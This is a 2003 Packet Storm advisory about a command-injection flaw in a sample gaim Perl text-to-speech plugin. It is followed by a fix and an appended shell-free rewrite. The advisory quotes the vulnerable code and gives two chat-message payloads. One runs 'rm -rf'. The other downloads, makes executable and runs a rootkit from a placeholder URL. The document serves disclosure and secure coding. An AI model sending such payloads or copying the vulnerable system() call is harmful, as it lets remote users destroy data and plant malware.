gaimexploit.txt

2003-10-16T00:00:00
ID PACKETSTORM:31824
Type packetstorm
Reporter error
Modified 2003-10-16T00:00:00

Description

                                        
It has come to my attention that people have actually used this example
code for a gaim plugin:  
  
AIM::register("Festival TTS", "0.0.1", "goodbye", "");  
AIM::print("Perl Says", "Loaded Festival TTS");  
AIM::command("idle", "60000") if ($pro ne "Offline");  
AIM::add_event_handler("event_im_recv", "synthesize");  
  
sub goodbye {  
AIM::print("Module Unloaded", "Unloaded Festival TTS");  
}  
  
sub synthesize {  
my $string = $_[0];  
$string =~ s/\<.*?\>//g;  
$string =~ s/\".*\"//;  
system("echo \"$string\" | /usr/bin/festival --tts");  
}  
  
As taken from:  
http://www.webreference.com/perl/tutorial/13/aim_fest_plugin.pl  
  
This has to be one of the most amusing ways to gain a local user's
privileges I have ever seen by an "Expert (TM)"
  
Exploit code?  
You have a shell through gaim with that.  
  
Just pass it this message (or really any message for that matter):  
  
Hey, I just wanted to exploit your box, do you mind?"; rm -rf;  
  
Or perhaps:  
  
Hey, grab this root kit for me?";wget http://url/to/rootkit;chmod +x  
rootkit;./rootkit  
  
Perhaps someone should ask:  
  
"(Is s/[^\w]//g really that hard to do?!)"  
  
So a fixed version would look like this:  
  
AIM::register("Festival TTS", "0.0.1", "goodbye", "");  
AIM::print("Perl Says", "Loaded Festival TTS");  
AIM::command("idle", "60000") if ($pro ne "Offline");  
AIM::add_event_handler("event_im_recv", "synthesize");  
  
sub goodbye {  
AIM::print("Module Unloaded", "Unloaded Festival TTS");  
}  
  
sub synthesize {  
my $string = $_[0];  
$string =~ s/\<.*?\>//g;  
$string =~ s/\".*\"//;  
$string =~ s/[^\w]//g;  
system("echo \"$string\" | /usr/bin/festival --tts");  
}  
  
Just a minor comment, nothing special.  
--   
error <error@lostinthenoise.net>  
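
Added example (not part of the original post or of the webreference plugin): a variant of synthesize() that never involves a shell, so the message needs no escaping and keeps the spaces and punctuation that s/[^\w]//g strips. The names clean_for_speech, speak and @TTS are assumptions made for this sketch, and the constructed demo uses cat as a stand-in for festival so it runs on any Unix host.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Speech command kept as an argument list, so no shell ever parses it.
# The path is the one used in the plugin above.
my @TTS = ('/usr/bin/festival', '--tts');

# Reduce an incoming IM to plain text for speech. This step is cosmetic;
# the safety comes from how the text is handed to the child process.
sub clean_for_speech {
    my ($msg) = @_;
    $msg =~ s/<[^>]*>//g;                # drop HTML markup sent by AIM clients
    $msg =~ s/[\x00-\x1f\x7f\s]+/ /g;    # control chars and whitespace runs -> one space
    return $msg;
}

# Write the text to the command's stdin. The list form of open() with '|-'
# forks and execs the program directly, so quotes, ';', '$' and backticks
# in the message are only bytes on a pipe and never reach /bin/sh.
sub speak {
    my ($text, @cmd) = @_;
    local $SIG{PIPE} = 'IGNORE';         # a dying child must not kill the client
    open(my $tts, '|-', @cmd)
        or do { warn "cannot run $cmd[0]: $!\n"; return 0 };
    print {$tts} $text, "\n";
    return close($tts) ? 1 : 0;          # close() waits for the child to exit
}

# Handler with the same shape as the plugin's synthesize().
sub synthesize {
    return speak(clean_for_speech($_[0]), @TTS);
}

# Constructed demo input, run only when the file is executed directly.
unless (caller) {
    my $im = '<b>Hey</b>, do you mind?"; echo INJECTED; "';
    speak(clean_for_speech($im), 'cat', '-');
}
```

Run directly, the demo shows the message text, quotes and semicolons included, arriving on the child's stdin as data; the echo in it is never executed.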